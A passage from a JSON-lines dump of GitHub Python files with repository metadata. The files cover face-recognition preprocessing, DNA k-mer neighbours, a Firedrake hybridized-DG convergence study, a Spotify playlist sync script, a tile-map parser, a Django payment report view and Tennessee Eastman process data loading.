right_eye_center[1]\r\n\r\n\r\n if left_eye_y > right_eye_y:\r\n\r\n point_3rd = (right_eye_x, left_eye_y)\r\n direction = -1 #rotate same direction to clock\r\n #print(\"rotate to clock direction\")\r\n else:\r\n\r\n point_3rd = (left_eye_x, right_eye_y)\r\n direction = 1 #rotate inverse direction of clock\r\n #print(\"rotate to inverse clock direction\")\r\n\r\n\r\n\r\n def euclidean_distance(a, b):\r\n x1 = a[0]; y1 = a[1]\r\n x2 = b[0]; y2 = b[1]\r\n return math.sqrt(((x2 - x1) * (x2 - x1)) + ((y2 - y1) * (y2 - y1)))\r\n a = euclidean_distance(left_eye_center, point_3rd)\r\n b = euclidean_distance(right_eye_center, left_eye_center)\r\n c = euclidean_distance(right_eye_center, point_3rd)\r\n\r\n cos_a = (b*b + c*c - a*a)/(2*b*c)\r\n #print(\"cos(a) = \", cos_a)\r\n\r\n angle = np.arccos(cos_a)\r\n #print(\"angle: \", angle,\" in radian\")\r\n\r\n angle = (angle * 180) / math.pi\r\n # print(\"angle: \", angle,\" in degree\")\r\n if direction == -1:\r\n angle = 90 - angle\r\n\r\n\r\n new_img = Image.fromarray(img)\r\n new_img = np.array(new_img.rotate(direction * angle))\r\n #cv2.imshow(\"Face After enhancement and rotating\",new_img)\r\n #cv2.waitKey(1)\r\n img = img_to_array(new_img)\r\n img = cv2.resize(img, (160, 160))\r\n img = np.expand_dims(img, axis=0) \r\n\r\n mean, std = img.mean(), img.std()\r\n img = (img-mean)/std\r\n return img\r\n else : \r\n raise Exception(\"Make sure that face in image with path \",image_path, \" has a face ! \")\r\n\r\n\r\ndef findEuclideanDistance(source_representation, test_representation): \r\n euclidean_distance = source_representation - test_representation\r\n euclidean_distance = np.sum(np.multiply(euclidean_distance, euclidean_distance))\r\n euclidean_distance = np.sqrt(euclidean_distance)\r\n return euclidean_distance\r\n\r\n\r\n\r\n\r\n\r\ndef Create_DB(employees,db_path,interpreter, input_details, output_details): #Create representation for face in DB\r\n file_name = \"representations.pkl\"\r\n St =time.time()\r\n HomeownerPath=db_path+\"/\"+\"HomeOwners\"\r\n if path.exists(HomeownerPath+\"/\"+file_name):\r\n\r\n print(\"WARNING: Representations for images in \",HomeownerPath,\" folder were previously stored in \", file_name, )\r\n print( \"Thus, if you added new instances after this file creation, then please delete this file and call find function again. 
It will create it again.\")\r\n print(HomeownerPath+\"/\"+file_name, 'rb')\r\n f = open(HomeownerPath+\"/\"+file_name, 'rb')\r\n representations = pickle.load(f)\r\n\r\n print(\"There are \", len(representations),\" representations found in \",file_name)\r\n #print(representations)\r\n return representations\r\n \r\n elif(len(listdir(HomeownerPath))):\r\n faceDetection = mp.solutions.face_detection.FaceDetection(0.8)\r\n\r\n for employee in listdir(HomeownerPath):\r\n if(employee != file_name):\r\n for img in listdir(HomeownerPath +\"/\"+employee):\r\n #employee, extension = file.split(\".\")\r\n #TmpPath= HomeownerPath + \"\\%s.jpg\"\r\n img = preprocess_image_with_mediaPipe(faceDetection, HomeownerPath +\"/\"+employee+\"/\"+img )\r\n img_pixels= np.array(img, dtype=np.float32)\r\n interpreter.set_tensor(input_details[0]['index'],img_pixels )\r\n interpreter.invoke()\r\n representation = interpreter.get_tensor(output_details[0]['index'])\r\n employees.append((employee,representation))\r\n\r\n #-------------------------------\r\n\r\n \r\n\r\n print(\"Faces In DB representations retrieved successfully\")\r\n file_name = \"representations.pkl\"\r\n f = open(HomeownerPath+\"/\"+file_name, \"wb\")\r\n pickle.dump(employees, f)\r\n f.close()\r\n #print (employees)\r\n print(\"it takes \" , round(time.time() -St , 2),\" seconds To Create DB From Scratch\")\r\n print(\"Representations stored in \",HomeownerPath+\"/\"+file_name,\" file. Please delete this file when you add new identities in your database.\")\r\n return employees\r\n else:\r\n raise ValueError(\"There is no images in \", db_path,\" folder! Validate .jpg or .png files exist in this path.\")","repo_name":"KerolosMelad/Smart-home-system","sub_path":"CreateDB.py","file_name":"CreateDB.py","file_ext":"py","file_size_in_byte":6391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"19837355019","text":"# def InmediateNeighbors(pat):\n# Neighborhood = [pat]\n# nucleotide = {'A','C','G','T'}\n# for i in range(1, len(pat)):\n# symbol = pat[i]\n# for j in nucleotide:\n# if j!=symbol:\n# Neighbor=pat[:i]+j+pat[i+1:]\n# Neighborhood.append(Neighbor)\n# return Neighborhood\n\n# print(InmediateNeighbors('AATAC'))\n\n# def Neighbors(pat):\n# Neighborhood = [pat]\n# nucleotide = {'A','C','G','T'}\n# pat1=pat[1:]\n# Neigh =[]\n# for i in range(len(pat1)):\n# symbol = pat1[i]\n# for j in nucleotide:\n# if j!=symbol:\n# Neighbor=pat1[:i]+j+pat1[i+1:]\n# Neighborhood.append(Neighbor)\n# Neigh.append(pat[0]+Neighbor)\n# for i in range()\n# Neigh.append(pat[0]+Neighborhood[-1])\n# Neigh.append(nucleotide+pat[-1])\n# return Neigh\n\n# print(Neighbors('CAA'))\n\ndef Hamming(p,q):\n count =0\n for i in range(len(p)):\n if p[i]!=q[i]:\n count +=1\n return count\n\n\ndef Neighbors(pat,d):\n nucleotide = ['A','C','G','T']\n if d==0:\n return pat\n if len(pat) ==1:\n return nucleotide\n Neighboorhood = set()\n Suffixneighbors = Neighbors(pat[1:len(pat)],d)\n for i in Suffixneighbors:\n if Hamming(i, pat[1:len(pat)])<d:\n for j in nucleotide:\n Neighboorhood.add(j+i)\n else:\n Neighboorhood.add(pat[0]+i)\n return Neighboorhood\n\nprint(Neighbors('ACG',1)) \n\nprint(' '.join([str(elem) for elem in list(Neighbors('CTTATTAT',2))]).replace(' ',' '))","repo_name":"maiderag/BioinformaticsI","sub_path":"Neighbors.py","file_name":"Neighbors.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} 
+{"seq_id":"33441357517","text":"\"\"\"\nThis module runs a convergence history for a hybridized-DG\ndiscretization of a model elliptic problem (detailed in the main\nfunction). The method used is the LDG-H method.\n\"\"\"\n\nfrom firedrake import *\nfrom firedrake.petsc import PETSc\nfrom firedrake import COMM_WORLD\nimport numpy as np\nimport pandas as pd\n\n\ndef run_LDG_H_problem(r, degree, tau_order, write=False):\n \"\"\"\n Solves the Dirichlet problem for the elliptic equation:\n\n -div(grad(u)) = f in [0, 1]^2, u = g on the domain boundary.\n\n The source function f and g are chosen such that the analytic\n solution is:\n\n u(x, y) = sin(x*pi)*sin(y*pi).\n\n This problem was crafted so that we can test the theoretical\n convergence rates for the hybridized DG method: LDG-H. This\n is accomplished by introducing the numerical fluxes:\n\n u_hat = lambda,\n q_hat = q + tau*(u - u_hat).\n\n The Slate DLS in Firedrake is used to perform the static condensation\n of the full LDG-H formulation of the Poisson problem to a single\n system for the trace u_hat (lambda) on the mesh skeleton:\n\n S * Lambda = E.\n\n The resulting linear system is solved via a direct method (LU) to\n ensure an accurate approximation to the trace variable. Once\n the trace is solved, the Slate DSL is used again to solve the\n elemental systems for the scalar solution u and its flux q.\n\n Post-processing of the scalar variable, as well as its flux, is\n performed using Slate to form and solve the elemental-systems for\n new approximations u*, q*. Depending on the choice of tau, these\n new solutions have superconvergent properties.\n\n The post-processed scalar u* superconverges at a rate of k+2 when\n two conditions are satisfied:\n\n (1) q converges at a rate of k+1, and\n (2) the cell average of u, ubar, superconverges at a rate of k+2.\n\n The choice of tau heavily influences these two conditions. For all\n tau > 0, the post-processed flux q* has enhanced convervation\n properties! The new solution q* has the following three properties:\n\n (1) q* converges at the same rate as q. However,\n (2) q* is in H(Div), meaning that the interior jump of q* is zero!\n And lastly,\n (3) div(q - q*) converges at a rate of k+1.\n\n The expected (theoretical) rates for the LDG-H method are\n summarized below for various orders of tau:\n\n -----------------------------------------------------------------\n u q ubar u* q* div(p*)\n -----------------------------------------------------------------\n tau = O(1) (k>0) k+1 k+1 k+2 k+2 k+1 k+1\n tau = O(h) (k>0) k k+1 k+2 k+2 k+1 k+1\n tau = O(1/h) (k>0) k+1 k k+1 k+1 k k+1\n -----------------------------------------------------------------\n\n Note that the post-processing used for the flux q only holds for\n simplices (triangles and tetrahedra). If someone knows of a local\n post-processing method valid for quadrilaterals, please contact me!\n For these numerical results, we chose the following values of tau:\n\n tau = O(1) -> tau = 1,\n tau = O(h) -> tau = h,\n tau = O(1/h) -> tau = 1/h,\n\n where h here denotes the facet area.\n\n This demo was written by: Thomas H. 
Gibson (t.gibson15@imperial.ac.uk)\n \"\"\"\n\n if tau_order is None or tau_order not in (\"1\", \"1/h\", \"h\"):\n raise ValueError(\n \"Must specify tau to be of order '1', '1/h', or 'h'\"\n )\n\n assert degree > 0, \"Provide a degree >= 1\"\n\n # Set up problem domain\n mesh = UnitSquareMesh(2**r, 2**r, quadrilateral=False)\n x = SpatialCoordinate(mesh)\n n = FacetNormal(mesh)\n\n # Set up function spaces\n U = VectorFunctionSpace(mesh, \"DG\", degree)\n V = FunctionSpace(mesh, \"DG\", degree)\n T = FunctionSpace(mesh, \"HDiv Trace\", degree)\n\n # Mixed space and test/trial functions\n W = U * V * T\n s = Function(W, name=\"solutions\").assign(0.0)\n q, u, uhat = split(s)\n v, w, mu = TestFunctions(W)\n\n # Analytical solutions for u and q\n V_a = FunctionSpace(mesh, \"DG\", degree + 3)\n U_a = VectorFunctionSpace(mesh, \"DG\", degree + 3)\n\n u_a = Function(V_a, name=\"Analytic Scalar\")\n a_scalar = sin(pi*x[0])*sin(pi*x[1])\n u_a.interpolate(a_scalar)\n\n q_a = Function(U_a, name=\"Analytic Flux\")\n a_flux = -grad(a_scalar)\n q_a.project(a_flux)\n\n Vh = FunctionSpace(mesh, \"DG\", degree + 3)\n f = Function(Vh).interpolate(-div(grad(a_scalar)))\n\n # Determine stability parameter tau\n if tau_order == \"1\":\n tau = Constant(1)\n\n elif tau_order == \"1/h\":\n tau = 1/FacetArea(mesh)\n\n elif tau_order == \"h\":\n tau = FacetArea(mesh)\n\n else:\n raise ValueError(\"Invalid choice of tau\")\n\n # Numerical flux\n qhat = q + tau*(u - uhat)*n\n\n # Formulate the LDG-H method in UFL\n a = ((dot(v, q) - div(v)*u)*dx\n + uhat('+')*jump(v, n=n)*dS\n + uhat*dot(v, n)*ds\n - dot(grad(w), q)*dx\n + jump(qhat, n=n)*w('+')*dS\n + dot(qhat, n)*w*ds\n # Transmission condition\n + mu('+')*jump(qhat, n=n)*dS)\n\n L = w*f*dx\n F = a - L\n PETSc.Sys.Print(\"Solving using static condensation.\\n\")\n params = {'snes_type': 'ksponly',\n 'mat_type': 'matfree',\n 'pmat_type': 'matfree',\n 'ksp_type': 'preonly',\n 'pc_type': 'python',\n # Use the static condensation PC for hybridized problems\n # and use a direct solve on the reduced system for u_hat\n 'pc_python_type': 'firedrake.SCPC',\n 'pc_sc_eliminate_fields': '0, 1',\n 'condensed_field': {'ksp_type': 'preonly',\n 'pc_type': 'lu',\n 'pc_factor_mat_solver_type': 'mumps'}}\n\n bcs = DirichletBC(W.sub(2), Constant(0.0), \"on_boundary\")\n problem = NonlinearVariationalProblem(F, s, bcs=bcs)\n solver = NonlinearVariationalSolver(problem, solver_parameters=params)\n solver.solve()\n PETSc.Sys.Print(\"Solver finished.\\n\")\n\n # Computed flux, scalar, and trace\n q_h, u_h, uhat_h = s.split()\n\n # Now we compute the various metrics. First we\n # simply compute the L2 error between the analytic\n # solutions and the computed ones.\n scalar_error = errornorm(a_scalar, u_h, norm_type=\"L2\")\n flux_error = errornorm(a_flux, q_h, norm_type=\"L2\")\n\n # We keep track of all metrics using a Python dictionary\n error_dictionary = {\"scalar_error\": scalar_error,\n \"flux_error\": flux_error}\n\n # Now we use Slate to perform element-wise post-processing\n\n # Scalar post-processing:\n # This gives an approximation in DG(k+1) via solving for\n # the solution of the local Neumman data problem:\n #\n # (grad(u), grad(w))*dx = -(q_h, grad(w))*dx\n # m(u) = m(u_h) for all elements K, where\n #\n # m(v) := measure(K)^-1 * int_K v dx.\n\n # NOTE: It is currently not possible to correctly formulate this\n # in UFL. 
However, we can introduce a Lagrange multiplier and\n # transform the local problem above into a local mixed system:\n #\n # find (u, psi) in DG(k+1) * DG(0) such that:\n #\n # (grad(u), grad(w))*dx + (psi, grad(w))*dx = -(q_h, grad(w))*dx\n # (u, phi)*dx = (u_h, phi)*dx,\n #\n # for all w, phi in DG(k+1) * DG(0).\n DGk1 = FunctionSpace(mesh, \"DG\", degree + 1)\n DG0 = FunctionSpace(mesh, \"DG\", 0)\n Wpp = DGk1 * DG0\n\n up, psi = TrialFunctions(Wpp)\n wp, phi = TestFunctions(Wpp)\n\n # Create mixed tensors:\n K = Tensor((inner(grad(up), grad(wp)) +\n inner(psi, wp) +\n inner(up, phi))*dx)\n F = Tensor((-inner(q_h, grad(wp)) +\n inner(u_h, phi))*dx)\n\n E = K.inv * F\n\n PETSc.Sys.Print(\"Local post-processing of the scalar variable.\\n\")\n u_pp = Function(DGk1, name=\"Post-processed scalar\")\n assemble(E.blocks[0], tensor=u_pp)\n\n # Now we compute the error in the post-processed solution\n # and update our error dictionary\n scalar_pp_error = errornorm(a_scalar, u_pp, norm_type=\"L2\")\n error_dictionary.update({\"scalar_pp_error\": scalar_pp_error})\n\n # Post processing of the flux:\n # This is a modification of the local Raviart-Thomas projector.\n # We solve the local problem: find 'q_pp' in RT(k+1)(K) such that\n #\n # (q_pp, v)*dx = (q_h, v)*dx,\n # (q_pp.n, gamma)*dS = (qhat.n, gamma)*dS\n #\n # for all v, gamma in DG(k-1) * DG(k)|_{trace}. The post-processed\n # solution q_pp converges at the same rate as q_h, but is HDiv\n # conforming. For all LDG-H methods,\n # div(q_pp) converges at the rate k+1. This is a way to obtain a\n # flux with better conservation properties. For tau of order 1/h,\n # div(q_pp) converges faster than q_h.\n qhat_h = q_h + tau*(u_h - uhat_h)*n\n local_RT = FiniteElement(\"RT\", triangle, degree + 1)\n RTd = FunctionSpace(mesh, BrokenElement(local_RT))\n DGkn1 = VectorFunctionSpace(mesh, \"DG\", degree - 1)\n\n # Use the trace space already defined\n Npp = DGkn1 * T\n n_p = TrialFunction(RTd)\n vp, mu = TestFunctions(Npp)\n\n # Assemble the local system and invert using Slate\n A = Tensor(inner(n_p, vp)*dx +\n jump(n_p, n=n)*mu*dS + dot(n_p, n)*mu*ds)\n B = Tensor(inner(q_h, vp)*dx +\n jump(qhat_h, n=n)*mu*dS + dot(qhat_h, n)*mu*ds)\n\n PETSc.Sys.Print(\"Local post-processing of the flux.\\n\")\n q_pp = assemble(A.inv * B)\n\n # And check the error in our new flux\n flux_pp_error = errornorm(a_flux, q_pp, norm_type=\"L2\")\n\n # To verify our new flux is HDiv conforming, we also\n # evaluate its jump over mesh interiors. This should be\n # approximately zero if everything worked correctly.\n flux_pp_jump = assemble(jump(q_pp, n=n)*dS)\n\n error_dictionary.update({\"flux_pp_error\": flux_pp_error})\n error_dictionary.update({\"flux_pp_jump\": np.abs(flux_pp_jump)})\n\n PETSc.Sys.Print(\"Post-processing finished.\\n\")\n\n PETSc.Sys.Print(\"Finished test case for h=1/2^%d.\\n\" % r)\n\n # If write specified, then write output\n if write:\n if tau_order == \"1/h\":\n o = \"hneg1\"\n else:\n o = tau_order\n\n File(\"results/LDGH_tauO%s_deg%d.pvd\" %\n (o, degree)).write(q_a, u_a, q_h, u_h, u_pp)\n\n # Return all error metrics\n return error_dictionary, mesh\n\n\ndef compute_conv_rates(u):\n \"\"\"Computes the convergence rate for this particular test case\n\n :arg u: a list of errors.\n\n Returns a list of convergence rates. Note the first element of\n the list will be empty, as there is no previous computation to\n compare with. 
'---' will be inserted into the first component.\n \"\"\"\n\n u_array = np.array(u)\n rates = list(np.log2(u_array[:-1] / u_array[1:]))\n rates.insert(0, '---')\n return rates\n\n\ndef run_single_test(r, degree, tau_order, write=False):\n # Run a quick test given a degree, tau order, and resolution\n\n resolution_param = r\n PETSc.Sys.Print(\"Running LDG-H method (triangles) of degree %d with tau=O('%s') \"\n \"and mesh parameter h=1/2^%d.\" %\n (degree, tau_order, resolution_param))\n\n error_dict, _ = run_LDG_H_problem(r=resolution_param,\n degree=degree,\n tau_order=tau_order,\n write=write)\n\n PETSc.Sys.Print(\"Error in scalar: %0.8f\" %\n error_dict[\"scalar_error\"])\n PETSc.Sys.Print(\"Error in post-processed scalar: %0.8f\" %\n error_dict[\"scalar_pp_error\"])\n PETSc.Sys.Print(\"Error in flux: %0.8f\" %\n error_dict[\"flux_error\"])\n PETSc.Sys.Print(\"Error in post-processed flux: %0.8f\" %\n error_dict[\"flux_pp_error\"])\n PETSc.Sys.Print(\"Interior jump of post-processed flux: %0.8f\" %\n np.abs(error_dict[\"flux_pp_jump\"]))\n\n\ndef run_LDG_H_convergence(degree, tau_order, start, end):\n\n PETSc.Sys.Print(\"Running convergence test for LDG-H method (triangles) \"\n \"of degree %d with tau order '%s'\"\n % (degree, tau_order))\n\n # Create arrays to write to CSV file\n r_array = []\n scalar_errors = []\n scalar_pp_errors = []\n flux_errors = []\n flux_pp_errors = []\n flux_pp_jumps = []\n num_cells = []\n # Run over mesh parameters and collect error metrics\n for r in range(start, end + 1):\n r_array.append(r)\n error_dict, mesh = run_LDG_H_problem(r=r,\n degree=degree,\n tau_order=tau_order,\n write=False)\n\n # Extract errors and metrics\n scalar_errors.append(error_dict[\"scalar_error\"])\n scalar_pp_errors.append(error_dict[\"scalar_pp_error\"])\n flux_errors.append(error_dict[\"flux_error\"])\n flux_pp_errors.append(error_dict[\"flux_pp_error\"])\n flux_pp_jumps.append(error_dict[\"flux_pp_jump\"])\n num_cells.append(mesh.num_cells())\n\n # Now that all error metrics are collected, we can compute the rates:\n scalar_rates = compute_conv_rates(scalar_errors)\n scalar_pp_rates = compute_conv_rates(scalar_pp_errors)\n flux_rates = compute_conv_rates(flux_errors)\n flux_pp_rates = compute_conv_rates(flux_pp_errors)\n\n PETSc.Sys.Print(\"Error in scalar: %0.13f\" %\n scalar_errors[-1])\n PETSc.Sys.Print(\"Error in post-processed scalar: %0.13f\" %\n scalar_pp_errors[-1])\n PETSc.Sys.Print(\"Error in flux: %0.13f\" %\n flux_errors[-1])\n PETSc.Sys.Print(\"Error in post-processed flux: %0.13f\" %\n flux_pp_errors[-1])\n PETSc.Sys.Print(\"Interior jump of post-processed flux: %0.13f\" %\n np.abs(flux_pp_jumps[-1]))\n\n if COMM_WORLD.rank == 0:\n degrees = [degree] * len(r_array)\n data = {\"Mesh\": r_array,\n \"Degree\": degrees,\n \"NumCells\": num_cells,\n \"ScalarErrors\": scalar_errors,\n \"ScalarConvRates\": scalar_rates,\n \"PostProcessedScalarErrors\": scalar_pp_errors,\n \"PostProcessedScalarRates\": scalar_pp_rates,\n \"FluxErrors\": flux_errors,\n \"FluxConvRates\": flux_rates,\n \"PostProcessedFluxErrors\": flux_pp_errors,\n \"PostProcessedFluxRates\": flux_pp_rates}\n\n if tau_order == \"1/h\":\n o = \"hneg1\"\n else:\n o = tau_order\n\n df = pd.DataFrame(data)\n result = \"results/LDG-H-d%d-tau_order-%s.csv\" % (degree, o)\n df.to_csv(result, index=False, 
mode=\"w\")\n","repo_name":"thomasgibson/tabula-rasa","sub_path":"verification/LDGH/LDGH.py","file_name":"LDGH.py","file_ext":"py","file_size_in_byte":14704,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"44"} +{"seq_id":"613670828","text":"#!/usr/bin/env python\n# encoding: utf-8\n\"\"\"\nParse SRF playlogs into spotify playlists\n\"\"\"\n\nimport sys\nimport spotipy\nimport spotipy.util as util\nimport logging\nimport argparse\nfrom any2spotify import *\n\ndef main(argv=None):\n parser = argparse.ArgumentParser(description='Sync feed with spotify playlist')\n parser.add_argument('username',help='spotify username/account to sync the playlist to')\n parser.add_argument('feed',help='podcast feed URL, e.g. http://podcasts.srf.ch/rock_special_mpx.xml')\n parser.add_argument('--id',required=False,default=None,help='spotify playlist ID to sync to. overrides the playlist name below.')\n parser.add_argument('--name',required=False,default=None,help='spotify playlist name to sync to. the playlist is created if there is no such playlist for the user. the podcast title is used if omitted.')\n parser.add_argument('-v','--verbose',help='output debug logging',action='store_true',default=False)\n parser.add_argument('-a','--add',help='only add songs to the playlist, dont remove them if missing from the feed',action='store_true',default=False)\n parser.add_argument('-l','--limit',help='limit the total number of tracks in the playist (useful with --add, default=0=no limit)',default=0)\n args = parser.parse_args()\n\n logformat = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'\n\n if args.verbose:\n logging.basicConfig(level=logging.DEBUG, format=logformat)\n else:\n logging.basicConfig(level=logging.INFO, format=logformat)\n logging.getLogger('requests.packages.urllib3.connectionpool').setLevel(logging.WARNING)\n\n logging.debug(args)\n\n token = spotipy.util.prompt_for_user_token(args.username,'playlist-modify-public')\n spotify = spotipy.Spotify(auth=token)\n\n sync_podcastfeed_with_playlist(feed=args.feed,spotify=spotify,spotifyusername=args.username,playlist_name=args.name,playlist_id=args.id,addonly=args.add,limit=args.limit)\n\nif __name__ == \"__main__\":\n \"\"\"Boilerplate main function call\"\"\"\n sys.exit(main(sys.argv))\n\n","repo_name":"arska/srf2spotify","sub_path":"srf2spotify.py","file_name":"srf2spotify.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"44"} +{"seq_id":"42869099869","text":"import logging\nimport inspect\t\n\nlogger = logging.getLogger(__name__)\n\nclass MapMatrix:\n\n\tdef __init__(self):\n\t\tpass\n\n\tdef __init__(self, filename):\n\t\tself.map = self.read_map(filename)\n\n\tdef initialize_map(self, x_length, y_length):\n\t\tlogger.debug(\" (CALL) {}\".format(inspect.stack()[0][3]))\n\n\t\tmap = []\n\t\tfor y in range(y_length):\n\t\t\trow = []\n\t\t\tfor x in range(x_length):\n\t\t\t\trow.append(\"-\")\n\t\t\tmap.append(row)\n\t\tmap[-2][2] = \"M\"\n\n\t\tlogger.debug(\" (RTRN) {}\".format(inspect.stack()[0][3]))\n\t\treturn map\n\n\tdef read_map(self, filename):\n\t\tlogger.debug(\" (CALL) {}\".format(inspect.stack()[0][3]))\n\n\t\tlogger.info(\" Parsing {}\".format(filename))\n\t\tmap = []\n\t\tinput_file = open(filename)\n\t\tfor line in input_file:\n\t\t\tmap.append([])\n\t\t\t# line[-1] avoids getting the /n at the end\n\t\t\tfor char in line[:-1]:\n\t\t\t\tmap[-1].append(char)\n\n\t\tself.y_length = 
len(map)\n\t\tself.x_length = len(map[0])\n\t\n\t\t#logger.end(self, inspect.stack()[0][3])\n\t\tlogger.debug(\" (FINISHD){}\".format(inspect.stack()[0][3]))\n\t\treturn map\n\n\tdef print_map(self):\n\t\tlogger.debug(\" (CALL) {}\".format(inspect.stack()[0][3]))\n\t\tprint(\"Printing current map...\")\n\t\tprint(\"X tile length: {}, Y tile length: {}\".format(self.x_length, self.y_length))\n\t\tfor line in self.map:\n\t\t\tx_string = \"\"\n\t\t\tfor char in line:\n\t\t\t\tx_string += char\n\t\t\tprint(x_string)\n\t\t\n\t\tlogger.end(self, inspect.stack()[0][3])","repo_name":"ehauckdo/marioGraph","sub_path":"map_matrix.py","file_name":"map_matrix.py","file_ext":"py","file_size_in_byte":1350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"10488989006","text":"import decimal\nfrom dateutil import parser, relativedelta\n\nfrom django.shortcuts import render, Http404\nfrom django.views import View\nfrom django.contrib.auth.decorators import login_required\nfrom django.utils.decorators import method_decorator\nfrom django.utils import timezone\n\nfrom adsrental.models.lead_history_month import LeadHistoryMonth\nfrom adsrental.models.bundler import Bundler\n\n\nclass BundlerCheckView(View):\n @method_decorator(login_required)\n def get(self, request, bundler_id):\n now = timezone.localtime(timezone.now())\n\n select_dates = []\n for months_ago in range(3, 0, -1):\n select_dates.append((now.replace(day=1) - relativedelta.relativedelta(months=months_ago)).date())\n\n date_str = request.GET.get('date')\n if date_str:\n date = parser.parse(date_str).replace(tzinfo=timezone.get_current_timezone()).date()\n else:\n date = select_dates[-1]\n\n bundler = Bundler.objects.filter(id=int(bundler_id)).first()\n if not bundler:\n raise Http404\n\n if not request.user.is_superuser and request.user.bundler != bundler:\n raise Http404\n\n lead_histories = LeadHistoryMonth.objects.filter(\n lead__bundler=bundler,\n date=date,\n move_to_next_month=False,\n ).select_related('lead', 'lead__raspberry_pi')\n total = decimal.Decimal('0.00')\n for lead_history in lead_histories:\n total += lead_history.get_remaining_amount()\n\n return render(request, 'bundler_report_check.html', context=dict(\n lead_histories=lead_histories,\n bundler=bundler,\n date_formatted=date.strftime('%B %Y'),\n date=date,\n select_dates=select_dates,\n total=total,\n ))\n","repo_name":"yonadav-labs/adsrental-dashboard","sub_path":"adsrental/views/bundler/check.py","file_name":"check.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"38087129995","text":"import torch\r\nfrom torchvision.datasets import MNIST\r\nfrom torchvision.transforms import ToTensor\r\nfrom torch.utils.data import DataLoader,TensorDataset\r\nfrom sklearn import preprocessing\r\n\r\nimport scipy.io as scio\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nfrom sklearn.preprocessing import StandardScaler\r\nimport pandas\r\nimport os\r\nimport numpy as np\r\ndef getcluster():\r\n c = []\r\n c1 = [5, 8, 13, 26, 27, 29, 31, 32, 33, 37, 39, 40, 42, 46, 50]\r\n c2 = [0, 10, 15, 16, 17, 21, 24, 30, 34, 43, 51]\r\n c3 = [4, 20, 25, 28, 38]\r\n c4 = [1, 2, 7, 18, 19, 35, 41, 44, 45, 49]\r\n c5 = [3, 6, 9, 11, 12, 14, 22, 23, 36, 47, 48]\r\n c.append(c1)\r\n c.append(c2)\r\n c.append(c3)\r\n c.append(c4)\r\n c.append(c5)\r\n return c\r\ndef normalized_data(data):\r\n mu = data.mean(axis = 0)\r\n std = data.std(axis 
= 0)\r\n\r\n std = std\r\n t = (data - mu)/std\r\n\r\n return t, mu , std\r\n\r\ndef timewindow(samples ,windowlength ):\r\n\r\n sample_time = []\r\n for i in range(samples.shape[0]-windowlength+1):\r\n i = i+windowlength\r\n term = samples[i-windowlength:i,:]\r\n sample_time.append(np.concatenate(term,axis=0))\r\n sample_time_np = np.array(sample_time).reshape(-1,52*windowlength)\r\n return sample_time_np\r\ndef readnormal():\r\n filepath = r'D:\\TEDATA\\TEST'\r\n dpath = 'd00_te.dat'\r\n dDatapath = os.path.join(filepath, dpath)\r\n with open(dDatapath, 'r') as fr:\r\n data = fr.read()\r\n data = np.fromstring(data, dtype=np.float32, sep=' ')\r\n data = data.reshape(-1, 52)\r\n\r\n samples_Nocomp = data\r\n stdsc_00 = StandardScaler()\r\n mms_nor = MinMaxScaler()\r\n samples_Nocomp = stdsc_00.fit_transform(data)\r\n return samples_Nocomp\r\ndef readFile(IS_TRAIN,batch_size=20, window = False,windowl=2):\r\n c =getcluster()\r\n mms_00 = MinMaxScaler()\r\n stdsc_00 = StandardScaler()\r\n\r\n DATA = []\r\n LABEL = []\r\n filepath = r'D:\\TEDATA\\TEST'\r\n # dpath = ['d10train.csv','d11.dat', 'd16train.csv', 'd18.dat']\r\n dpath =['d00train.csv', 'd01train.csv', 'd02train.csv', 'd04train.csv', 'd05train.csv', 'd06train.csv', 'd07train.csv', 'd08train.csv','d10train.csv', 'd11train.csv',\r\n 'd12train.csv', 'd13train.csv', 'd14train.csv','d16train.csv', 'd17train.csv', 'd18train.csv', 'd19train.csv', 'd20train.csv']\r\n i = 0\r\n for Datapath in dpath:\r\n\r\n dDatapath = os.path.join(filepath, Datapath)\r\n\r\n if Datapath == 'd00train.csv':\r\n\r\n\r\n data = np.loadtxt(dDatapath, dtype=np.float32, delimiter=',')\r\n samples_Nocomp = data\r\n\r\n\r\n else:\r\n\r\n data = np.loadtxt(dDatapath, dtype=np.float32, delimiter=',')\r\n samples_Nocomp = data\r\n\r\n\r\n\r\n DATA.append(samples_Nocomp)\r\n\r\n label = i * np.ones(samples_Nocomp.shape[0])\r\n LABEL.append(label)\r\n i += 1\r\n\r\n data_TE_train = np.concatenate(np.array(DATA), axis=0)\r\n label_TE_train_s = np.concatenate(np.array(LABEL), axis=0)\r\n\r\n i=0\r\n DATA = []\r\n LABEL = []\r\n filepath = r'D:\\TEDATA\\TRAIN'\r\n\r\n dpath = ['d00test.csv', 'd01test.csv', 'd02test.csv', 'd04test.csv', 'd05test.csv','d06test.csv', 'd07test.csv','d08test.csv', 'd10test.csv','d11test.csv',\r\n 'd12test.csv','d13test.csv','d14test.csv','d16test.csv','d17test.csv','d18test.csv','d19test.csv','d20test.csv']\r\n for Datapath in dpath:\r\n\r\n dDatapath = os.path.join(filepath,Datapath)\r\n\r\n if Datapath == 'd00test.csv':\r\n\r\n data = np.loadtxt(dDatapath, dtype=np.float32, delimiter=',')\r\n samples_Nocomp = data\r\n\r\n\r\n else:\r\n\r\n data = np.loadtxt(dDatapath, dtype=np.float32, delimiter=',')\r\n samples_Nocomp = data\r\n\r\n DATA.append(samples_Nocomp)\r\n label = i * np.ones(samples_Nocomp.shape[0])\r\n LABEL.append(label)\r\n i +=1\r\n data_TE_test = np.concatenate(np.array(DATA), axis=0)\r\n label_TE_test_s = np.concatenate(np.array(LABEL), axis=0)\r\n i = 0\r\n DATA = []\r\n LABEL = []\r\n filepath = r'D:\\TEDATA\\TRAIN'\r\n\r\n dpath = ['d00validation.csv', 'd01validation.csv', 'd02validation.csv', 'd04validation.csv', 'd05validation.csv', 'd06validation.csv', 'd07validation.csv',\r\n 'd08validation.csv', 'd10validation.csv', 'd11validation.csv',\r\n 'd12validation.csv', 'd13validation.csv', 